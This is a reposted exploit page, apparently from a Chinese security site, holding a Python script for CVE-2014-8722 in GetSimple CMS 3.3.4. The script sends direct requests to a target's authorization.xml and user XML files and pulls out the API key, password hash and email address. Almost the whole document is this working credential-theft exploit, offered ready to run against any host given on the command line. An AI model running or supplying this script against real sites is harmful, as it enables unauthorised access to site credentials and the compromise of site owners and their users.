# CVE-2014-8722 GetSimple CMS 3.3.4 信息泄露漏洞
==EXP==
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.info/ # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip # Version: 3.3.4 # CVE: CVE-2014-8722 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit ''' Description: GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to (1) data/users/.xml, (2) backups/users/ .xml.bak, (3) data/other/authorization.xml, or (4) data/other/appid.xml. ''' ''' Import required modules: ''' import sys import requests ''' User-Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] cmspath = sys.argv[3] print('') username = input("Do you know the username? Y/N: ") if username == 'Y': print('') username = True username_string = input('Please enter the username: ') else: print('') username = False print('No problem, you will still get the API key') ''' Get Api-Key: ''' url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml' header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0" } x = requests.get(url, headers=header).text start = x.find('[') + 7 end = x.find(']') api_key = x[start:end] print('') print('Informations:') print('') print('[*] API Key: ' + api_key) if username: ''' Get Email and Passwordhash: ''' url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml' header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0" } x = requests.get(url, headers=header).text start = x[x.find('PWD>'):] passwordhash = start[start.find('>') +1 :start.find('<')] print('[*] Hashed Password: ' + passwordhash) start = x[x.find('EMAIL>'):] email = start[start.find('>') + 1 : start.find('<')] print('[*] Email: ' + email) print('')
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容